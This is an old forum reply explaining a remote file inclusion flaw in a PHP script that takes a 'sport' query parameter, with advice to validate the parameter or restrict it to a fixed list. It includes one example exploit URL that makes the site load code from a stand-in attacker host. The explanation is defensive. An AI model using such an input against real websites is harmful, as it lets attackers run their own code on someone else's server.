Posted by Colin McKinnon on 01/15/07 22:50

SA SA wrote:

> Hello,
> I do not know anything about PHP but thrown into this mix. I was told
> by my ISP that there is vulnerability in following code to allow
> spammer load an offsite php script for mailing.

There are 2 very odd things about this:

1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)

2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).

To exploit this, someone just has to enter a URL like:

http://www.sasas-site.com/code.php?sport=http%3A%2F%2Fwww.blackhat.net%2Fmalware.src

to get there code into your ISPs webserver.

> how od i fix it?
>

Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.

C.

[Back to original message]